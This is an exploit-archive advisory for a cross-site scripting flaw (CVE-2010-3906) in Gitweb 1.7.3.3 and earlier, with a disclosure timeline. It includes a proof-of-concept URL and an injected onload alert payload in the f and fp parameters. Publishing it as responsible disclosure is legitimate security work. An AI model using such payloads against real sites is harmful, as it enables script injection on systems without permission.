Gitweb <=1.7.3.3 Cross Site Scripting

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Gitweb <=1.7.3.3 Cross Site Scripting
# Published : 2010-12-15
# Author : emgent
# Previous Title : QualDev eCommerce script SQL Injection Vulnerability
# Next Title : CubeCart v 3.x Remote File Upload Vulnerability

>-8 Description 8-<
Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and previous versions
allows remote attackers to inject arbitrary web script or HTML code via f and fp variables.

>-8 Proof Of Concept 8-<
http://localhost/?p=foo/bar/ph33r.git;a=blobdiff;f=[XSS];fp=[XSS]
[XSS] => "><body onload="alert('xss')"> <a


>-8 Credits 8-<
Emanuele 'emgent' Gentili <e.gentili@tigersecurity.it>


>-8 Responsible Disclosure 8-<

13-12-2010	Initial contact with upstream and vendor-sec
13-12-2010	Vendor Response and CVE-2010-3906 assignation
15-12-2010	Public Disclosure